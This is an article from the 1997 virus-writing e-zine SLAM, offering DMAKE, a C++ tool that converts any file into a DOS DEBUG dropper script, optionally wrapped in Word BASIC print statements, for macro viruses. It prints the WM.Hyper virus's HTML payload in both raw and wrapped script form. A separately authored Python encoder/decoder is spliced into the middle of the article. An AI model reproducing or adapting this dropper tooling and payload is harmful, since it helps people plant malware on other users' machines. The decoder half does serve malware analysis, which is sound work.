SLAM3.007: Debug Script Data Maker by Hyperlock [SLAM]
If you ever wanted an easy way to create all those debug statements for your dropper in Word BASIC, well now you can. If you don't know what a dropper is, then you may be reading the wrong article. If, however, you do or you just don't care but want to know how to create the code anyway, then read on.
Before anyone e-mails me to tell me: yes, this utility can be used to create debug scripts for asm or Excel virii or whatever. I just used Word as an example.
OK, as a quick recap. A dropper in a Word BASIC virus normally uses DOS DEBUG to create the dropped binary or text file: the macro writes a DEBUG command script to disk, then runs DEBUG with that script as its standard input (debug < script), and DEBUG enters the bytes into memory and writes them out under the name given. In a typical virus the code will look something like this:
Open p$ + "\hyper.dbg" For Output As #1 <- open Word output file
Print #1, "n hyper.dat" <- name of debug output file
Print #1, "e 0100 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54"
Print #1, "e 0110 49 54 4c 45 3e 4d 69 63 72 6f 73 6f 66 74 20 49"
.. .. .. .. Data statements .. .. .. .. ..
Print #1, "e 0310 4e 54 3e 0a 3c 2f 54 44 3e 0a 3c 2f 54 52 3e 0a"
Print #1, "e 0320 3c 2f 54 41 42 4c 45 3e 0a 3c 2f 42 4f 44 59 3e"
Print #1, "e 0330 0a 3c 2f 48 54 4d 4c 3e"
Print #1, "rcx" <- register CX: debug shows it and prompts for a new value
Print #1, "0238" <- new CX value = length of file in hex (w writes CX bytes from 0100)
Print #1, "w" <- write file
Print #1, "q" <- quit debug
Close #1 <- close Word output file
Now, wouldn't it be great if all that crap was created for you from a standard virus file or text file (the file you want to drop)? This is a piece of cake, and the code is below in C++. If you know little or nothing about C++, then the code below shows you the fundamentals of constructors, destructors and objects. If you want to compile it, then I know it works on Borland compilers; I don't know if it works on Microsoft compilers, and quite frankly I don't give a shit. Microsoft compilers suck.
It works like this:
dmake [-w] <input file> <output file>
e.g. 1, dmake input.dat slam.scr
e.g. 2, dmake -w input.dat slam.scr
If you just want raw debug script output (see the first output example after the code), then don't pass the -w switch. If you want the program to create a proper basic output script for you, thus including the PRINT statements, pass the -w switch. That should save you a lot of time. :¨)
And, if you are forgetful or just don't pass the correct parameters, you will see a nice little UNIX-style usage reminder. It is short but sweet, and you should never see it. The EXE is really small, and should accompany this mag.
Look, I know this is a DOS version with no pretty windows and all that crap. I haven't got the time to mess about and this works. If you want to make it better, then you are welcome to do so. Just make sure you put me down as being the original author and don't rip me off, OK. And that goes for anything else in this mag ...
DO NOT COPY VIRUS CODE OR PROGRAMS WRITTEN BY SLAM MEMBERS OR ANY CONTRIBUTING PROGRAMMER AND PUT YOUR NAME ON IT. You didn't write the thing, the authors have.
After this code, there is an example input file and output file. If you think back to the hyper virus in SLAM2, you will have noticed the Internet Explorer infection dropper. Well, in case you were wondering what code was in it, have a look after the C++ code below. Read the article in SLAM 2 to see how the whole thing manifests itself.
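The same script format, going both ways, as an added example that is not part of the article and not Hyperlock's DMAKE code. encode() builds the raw or -w style script exactly as described above (n, e lines of 16 bytes from offset 0100, rcx, the length in hex, w, q). decode() is the part an analyst wants and that DMAKE does not have: given a script pulled out of a macro dropper, in either raw form or wrapped in print #1, "..." statements, it rebuilds the file DEBUG would have written, and rejects scripts where the rcx value does not cover exactly the bytes the e lines entered (DEBUG would happily write whatever was in memory below CX, or silently drop the tail above it). The MAX_LENGTH limit, the consistency checks and the print #n wrapper regex are my assumptions, not DMAKE or DEBUG behaviour; the sample bytes in the test are constructed from the first bytes of the article's own HTML payload.

```python
"""DOS DEBUG script encoder and decoder (added example, not code from the
SLAM article or from Hyperlock's DMAKE).

Script layout, exactly as the article describes it: "n <name>", one
"e <hex offset> <hex bytes>" line per 16 bytes starting at offset 0100,
then "rcx", the byte count in hex, "w" and "q".  decode() also accepts the
-w form, every line wrapped in  print #1, "..."  so a script lifted out
of a macro dropper can be turned back into the file it would have written.
"""
import re

LOAD_OFFSET = 0x100     # DEBUG's default data offset, as in the article
BYTES_PER_LINE = 16     # NUM_PARTS in DMAKE
MAX_LENGTH = 0xFF00     # assumption: 0100 + length must stay inside one 64K segment;
                        # bigger files need a BX:CX write, which this does not emit

# assumption: the BASIC wrapper looks like the page's  print #1, "..."  lines
_PRINT_RE = re.compile(r'^\s*print\s*#\d+\s*,\s*"(.*)"\s*$', re.IGNORECASE)


def encode(data: bytes, name: str = "myscript.scr", basic: bool = False) -> list:
    """Return the DEBUG script lines for data (DMAKE's -w form if basic=True)."""
    if len(data) > MAX_LENGTH:
        raise ValueError("file too large for a single-segment, CX-only write")
    lines = [f"n {name}"]
    for off in range(0, len(data), BYTES_PER_LINE):
        chunk = data[off:off + BYTES_PER_LINE]
        lines.append(f"e {LOAD_OFFSET + off:04x} " + " ".join(f"{b:02x}" for b in chunk))
    lines += ["rcx", f"{len(data):04x}", "w", "q"]
    if basic:
        lines = [f'print #1, "{line}"' for line in lines]
    return lines


def unwrap(line: str) -> str:
    """Strip a Word BASIC  print #1, "..."  wrapper, if there is one."""
    m = _PRINT_RE.match(line)
    return m.group(1) if m else line


def decode(script: str) -> tuple:
    """Reconstruct (filename, contents) from a DEBUG script.

    Raises ValueError when the 'e' lines leave a hole below CX (DEBUG would
    write whatever was in memory there) or when CX does not match what the
    lines filled (a truncated or hand-edited script): either way the file
    the dropper writes is not the one the hex suggests.
    """
    name, cx, image, expect_cx = None, None, {}, False
    for raw in script.splitlines():
        line = unwrap(raw).strip()
        if not line:
            continue
        if expect_cx:                       # the line after "rcx" is the new CX value
            cx, expect_cx = int(line, 16), False
            continue
        cmd, _, rest = line.partition(" ")
        cmd = cmd.lower()
        if cmd == "n":
            name = rest.strip()
        elif cmd == "e":
            off_s, _, hexbytes = rest.strip().partition(" ")
            off = int(off_s, 16)
            for i, h in enumerate(hexbytes.split()):
                image[off + i] = int(h, 16)
        elif cmd == "rcx":
            expect_cx = True
        elif cmd in ("w", "q"):
            pass
        else:
            raise ValueError(f"unsupported DEBUG command: {line!r}")
    if name is None or cx is None:
        raise ValueError("script has no 'n' line or no CX value")
    missing = [o for o in range(LOAD_OFFSET, LOAD_OFFSET + cx) if o not in image]
    if missing:
        raise ValueError(f"{len(missing)} byte(s) below CX never entered, first at {missing[0]:04x}")
    filled = (max(image) + 1 - LOAD_OFFSET) if image else 0
    if filled != cx:
        raise ValueError(f"rcx says {cx:04x} bytes but the 'e' lines fill {filled:04x}")
    return name, bytes(image[o] for o in range(LOAD_OFFSET, LOAD_OFFSET + cx))


if __name__ == "__main__":
    # dmake-style usage: python dbgscript.py [-w] infile outfile
    import sys
    args = sys.argv[1:]
    basic = bool(args) and args[0].lower() == "-w"
    if len(args) != (3 if basic else 2):
        sys.exit("usage: dbgscript.py [-w] infile outfile")
    infile, outfile = (args[1], args[2]) if basic else (args[0], args[1])
    with open(infile, "rb") as f:
        script = encode(f.read(), basic=basic)
    with open(outfile, "w") as f:
        f.write("\n".join(script) + "\n")
```

decode() tolerates the trailing space DMAKE leaves before the closing quote on each -w data line, and is case-insensitive on the commands, so the uppercase RCX/W/Q in the article's output and the lowercase form in the Word BASIC snippet both parse. When you pull a dropper script out of a macro, run it through decode() rather than trusting the hex by eye: a script whose rcx value was edited by hand is exactly the case the checks catch.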
-------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#define NUM_PARTS 16     // number of bytes per line
#define MAX_INPUT 40000  // largest file converted; keeps 0100 + length inside one 64K debug segment
//
// Debug Script Data Maker
// Hyperlock [SLAM], May 1997
// Version 1.03
//
//
// Class header definition for the data maker routines
//
class DMake
{
protected:
    FILE *InputFile;     // input file (the file to be dropped)
    FILE *OutputFile;    // output file (the debug script)
    int bytesread;       // number of bytes in input file
    int SwchArray[10];   // switch flag array
                         // --> pos 0 = 'w' switch
public:
    DMake();
    ~DMake();
    void SetSwitch(char *);
    void Convert(char *infile, char *outfile);
};
//
// Constructor: clear the switch flags, so a run with no switches
// does not pick up whatever happened to be lying around in memory
//
DMake::DMake()
{
    for (int i = 0; i < 10; i++)
        SwchArray[i] = 0;
}
//
// Null destructor
//
DMake::~DMake()
{
}
//
// Function to process command line switches
// Only processes one at the moment, but is easy to
// extend using the below structure.
//
void DMake::SetSwitch(char *swch)
{
    printf("Processing switches ...\n");
    switch (tolower((unsigned char) swch[1]))   // -w and -W both work
    {
        case 'w':
            printf("-w passed, will write BASIC print stream statements.\n\n");
            SwchArray[0] = 1;
            break;
        default:
            printf("No recognised switches passed, assuming none.\n\n");
            break;
    }
}
//
// Function to create script file for an input file
//
void DMake::Convert(char *infile, char *outfile)
{
    static unsigned char buf[MAX_INPUT]; // static: 40000 bytes is too big for a small DOS stack
    int x;

    // open the input first, so a missing input file does not leave an empty script behind
    InputFile = fopen(infile, "rb");     // binary: never translate 0a/0d in the dropped file
    if (InputFile == NULL)
    {
        printf("Cannot find input file %s\n", infile);
        return;
    }
    OutputFile = fopen(outfile, "w");
    if (OutputFile == NULL)
    {
        printf("Cannot create output file %s\n", outfile);
        fclose(InputFile);
        return;
    }
    printf("opened file %s for input\n", infile);
    printf("opened file %s for output\n", outfile);
    printf("writing %d bytes per line\n", NUM_PARTS);
    // read the whole file in one go; anything past MAX_INPUT bytes is not converted
    bytesread = (int) fread(buf, 1, MAX_INPUT, InputFile);
    if (ferror(InputFile))
    {
        printf("error reading input file %s\n", infile);
        fclose(InputFile);
        fclose(OutputFile);
        exit(1);
    }
    if (bytesread == MAX_INPUT && fgetc(InputFile) != EOF)
        printf("warning: input is longer than %d bytes, only the first %d were converted\n",
               MAX_INPUT, MAX_INPUT);
    // name of the file debug will write
    if (SwchArray[0] == 1)
        fprintf(OutputFile, "print #1, \"n myscript.scr\"\n");
    else
        fprintf(OutputFile, "n myscript.scr\n");
    // one 'e' line per NUM_PARTS bytes, starting at debug's default offset 0100
    for (x = 0; x < bytesread; x++)
    {
        if (x % NUM_PARTS == 0)
        {
            if (x != 0)
                fputs(SwchArray[0] == 1 ? "\"\n" : "\n", OutputFile);
            if (SwchArray[0] == 1)
                fprintf(OutputFile, "print #1, \"");
            fprintf(OutputFile, "e %04x ", 0x0100 + x);   // always four hex digits, then a space
        }
        fprintf(OutputFile, "%02x ", buf[x]);               // always two hex digits
    }
    // set CX to the file length, write, quit
    if (SwchArray[0] == 1)
    {
        if (bytesread > 0)
            fprintf(OutputFile, "\"\n");
        fprintf(OutputFile, "print #1, \"RCX\"\nprint #1, \"%04x\"\n", bytesread);
        fprintf(OutputFile, "print #1, \"W\"\nprint #1, \"Q\"\n");
    }
    else
    {
        if (bytesread > 0)
            fprintf(OutputFile, "\n");
        fprintf(OutputFile, "RCX\n%04x\nW\nQ\n", bytesread);
    }
    // close files
    if (fclose(InputFile) == 0)
        printf("closed input file %s\n", infile);
    if (fclose(OutputFile) == 0)
        printf("closed output file %s\n", outfile);
    printf("done\n");
}
int main(int argc, char **argv)
{
    char *infile, *outfile, *sw = NULL;
    DMake *hl;                           // pointer to DMake object
    printf("Debug Script Data Maker\n");
    printf("Hyperlock [SLAM], v1.03, May 1997\n\n");
    printf("This program will write out a debug script in text format.\n\n");
    // a first argument starting with '-' is a switch; argc is checked before
    // argv[1] is touched, so running with no arguments shows the usage instead of crashing
    if (argc >= 2 && argv[1][0] == '-')
        sw = argv[1];
    if ((sw == NULL && argc != 3) || (sw != NULL && argc != 4))
    {
        printf("Warning: Incorrect number of parameters passed.\n");
        printf("USAGE: dmake [-w] infile outfile\n");
        printf("\n-w include BASIC print stream statements\n");
        return 1;
    }
    if (sw != NULL)
    {
        infile = argv[2];
        outfile = argv[3];
    }
    else
    {
        infile = argv[1];
        outfile = argv[2];
    }
    hl = new DMake();                    // Create an instance of the DMake object
    if (sw != NULL)
        hl->SetSwitch(sw);               // Process command line switches
    else
        printf("No switches passed ...\nWriting out a script in raw debug format.\n\n");
    hl->Convert(infile, outfile);
    delete hl;                           // Delete instance hl of the DMake
    return 0;
}
-------------------------------------------------------------------
Example input file given to DMAKE. This is part of the payload for the Hyper virus; please see SLAM 2 for a description of the virus.
<HTML>
<HEAD>
<TITLE>Microsoft Internet Explorer</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!--
function ds()
{
window.status = "WM.Hyper has now infected Word and Internet Explorer!";
}
-->
</SCRIPT>
</HEAD>
<BODY onLoad="ds();">
<TABLE WIDTH=620 CELLPADDING=0 CELLSPACING=0 BORDER=0>
<TR>
<TD>
<FONT FACE="Arial" SIZE=2>
<MARQUEE WIDTH=600 SCROLLDELAY=80 BORDER=0>
Your system has been infected with the WM.Hyper virus.
It looks like you are gonna have to take some remedial action ...
(c) Hyperlock, March 1997
</MARQUEE>
</FONT>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
-------------------------------------------------------------------
Example output script created by DMAKE using the above input file and NO SWITCH.
** RAW OUTPUT **
n myscript.scr
e 0100 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54
e 0110 49 54 4c 45 3e 4d 69 63 72 6f 73 6f 66 74 20 49
e 0120 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72
e 0130 3c 2f 54 49 54 4c 45 3e 0a 3c 53 43 52 49 50 54
e 0140 20 4c 41 4e 47 55 41 47 45 3d 22 4a 61 76 61 53
e 0150 63 72 69 70 74 22 3e 0a 3c 21 2d 2d 0a 66 75 6e
e 0160 63 74 69 6f 6e 20 64 73 28 29 0a 7b 0a 77 69 6e
e 0170 64 6f 77 2e 73 74 61 74 75 73 20 3d 20 22 57 4d
e 0180 2e 48 79 70 65 72 20 68 61 73 20 6e 6f 77 20 69
e 0190 6e 66 65 63 74 65 64 20 57 6f 72 64 20 61 6e 64
e 01a0 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72
e 01b0 65 72 21 22 3b 0a 7d 0a 2d 2d 3e 0a 3c 2f 53 43
e 01c0 52 49 50 54 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42
e 01d0 4f 44 59 20 6f 6e 4c 6f 61 64 3d 22 64 73 28 29
e 01e0 3b 22 3e 0a 3c 54 41 42 4c 45 20 57 49 44 54 48
e 01f0 3d 36 32 30 20 43 45 4c 4c 50 41 44 44 49 4e 47
e 0200 3d 30 20 43 45 4c 4c 53 50 41 43 49 4e 47 3d 30
e 0210 20 42 4f 52 44 45 52 3d 30 3e 0a 3c 54 52 3e 0a
e 0220 3c 54 44 3e 0a 3c 46 4f 4e 54 20 46 41 43 45 3d
e 0230 22 41 72 69 61 6c 22 20 53 49 5a 45 3d 32 3e 0a
e 0240 3c 4d 41 52 51 55 45 45 20 57 49 44 54 48 3d 36
e 0250 30 30 20 53 43 52 4f 4c 4c 44 45 4c 41 59 3d 38
e 0260 30 20 42 4f 52 44 45 52 3d 30 3e 0a 59 6f 75 72
e 0270 20 73 79 73 74 65 6d 20 68 61 73 20 62 65 65 6e
e 0280 20 69 6e 66 65 63 74 65 64 20 77 69 74 68 20 74
e 0290 68 65 20 57 4d 2e 48 79 70 65 72 20 76 69 72 75
e 02a0 73 2e 20 0a 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b
e 02b0 65 20 79 6f 75 20 61 72 65 20 67 6f 6e 6e 61 20
e 02c0 68 61 76 65 20 74 6f 20 74 61 6b 65 20 73 6f 6d
e 02d0 65 20 72 65 6d 65 64 69 61 6c 20 61 63 74 69 6f
e 02e0 6e 20 2e 2e 2e 20 0a 28 63 29 20 48 79 70 65 72
e 02f0 6c 6f 63 6b 2c 20 4d 61 72 63 68 20 31 39 39 37
e 0300 0a 3c 2f 4d 41 52 51 55 45 45 3e 0a 3c 2f 46 4f
e 0310 4e 54 3e 0a 3c 2f 54 44 3e 0a 3c 2f 54 52 3e 0a
e 0320 3c 2f 54 41 42 4c 45 3e 0a 3c 2f 42 4f 44 59 3e
e 0330 0a 3c 2f 48 54 4d 4c 3e
RCX
0238
W
Q
-------------------------------------------------------------------
Example output script created by DMAKE using the above input file and the -w SWITCH.
** VB, VBA or Word BASIC **
print #1, "n myscript.scr"
print #1, "e 0100 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 "
print #1, "e 0110 49 54 4c 45 3e 4d 69 63 72 6f 73 6f 66 74 20 49 "
print #1, "e 0120 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 "
print #1, "e 0130 3c 2f 54 49 54 4c 45 3e 0a 3c 53 43 52 49 50 54 "
print #1, "e 0140 20 4c 41 4e 47 55 41 47 45 3d 22 4a 61 76 61 53 "
print #1, "e 0150 63 72 69 70 74 22 3e 0a 3c 21 2d 2d 0a 66 75 6e "
print #1, "e 0160 63 74 69 6f 6e 20 64 73 28 29 0a 7b 0a 77 69 6e "
print #1, "e 0170 64 6f 77 2e 73 74 61 74 75 73 20 3d 20 22 57 4d "
print #1, "e 0180 2e 48 79 70 65 72 20 68 61 73 20 6e 6f 77 20 69 "
print #1, "e 0190 6e 66 65 63 74 65 64 20 57 6f 72 64 20 61 6e 64 "
print #1, "e 01a0 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 "
print #1, "e 01b0 65 72 21 22 3b 0a 7d 0a 2d 2d 3e 0a 3c 2f 53 43 "
print #1, "e 01c0 52 49 50 54 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 "
print #1, "e 01d0 4f 44 59 20 6f 6e 4c 6f 61 64 3d 22 64 73 28 29 "
print #1, "e 01e0 3b 22 3e 0a 3c 54 41 42 4c 45 20 57 49 44 54 48 "
print #1, "e 01f0 3d 36 32 30 20 43 45 4c 4c 50 41 44 44 49 4e 47 "
print #1, "e 0200 3d 30 20 43 45 4c 4c 53 50 41 43 49 4e 47 3d 30 "
print #1, "e 0210 20 42 4f 52 44 45 52 3d 30 3e 0a 3c 54 52 3e 0a "
print #1, "e 0220 3c 54 44 3e 0a 3c 46 4f 4e 54 20 46 41 43 45 3d "
print #1, "e 0230 22 41 72 69 61 6c 22 20 53 49 5a 45 3d 32 3e 0a "
print #1, "e 0240 3c 4d 41 52 51 55 45 45 20 57 49 44 54 48 3d 36 "
print #1, "e 0250 30 30 20 53 43 52 4f 4c 4c 44 45 4c 41 59 3d 38 "
print #1, "e 0260 30 20 42 4f 52 44 45 52 3d 30 3e 0a 59 6f 75 72 "
print #1, "e 0270 20 73 79 73 74 65 6d 20 68 61 73 20 62 65 65 6e "
print #1, "e 0280 20 69 6e 66 65 63 74 65 64 20 77 69 74 68 20 74 "
print #1, "e 0290 68 65 20 57 4d 2e 48 79 70 65 72 20 76 69 72 75 "
print #1, "e 02a0 73 2e 20 0a 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b "
print #1, "e 02b0 65 20 79 6f 75 20 61 72 65 20 67 6f 6e 6e 61 20 "
print #1, "e 02c0 68 61 76 65 20 74 6f 20 74 61 6b 65 20 73 6f 6d "
print #1, "e 02d0 65 20 72 65 6d 65 64 69 61 6c 20 61 63 74 69 6f "
print #1, "e 02e0 6e 20 2e 2e 2e 20 0a 28 63 29 20 48 79 70 65 72 "
print #1, "e 02f0 6c 6f 63 6b 2c 20 4d 61 72 63 68 20 31 39 39 37 "
print #1, "e 0300 0a 3c 2f 4d 41 52 51 55 45 45 3e 0a 3c 2f 46 4f "
print #1, "e 0310 4e 54 3e 0a 3c 2f 54 44 3e 0a 3c 2f 54 52 3e 0a "
print #1, "e 0320 3c 2f 54 41 42 4c 45 3e 0a 3c 2f 42 4f 44 59 3e "
print #1, "e 0330 0a 3c 2f 48 54 4d 4c 3e "
print #1, "RCX"
print #1, "0238"
print #1, "W"
print #1, "Q"
-------------------------------------------------------------------
Enjoy, and please let me know if you find this useful.
Hyperlock [SLAM] e-mail: hyperlock@usa.net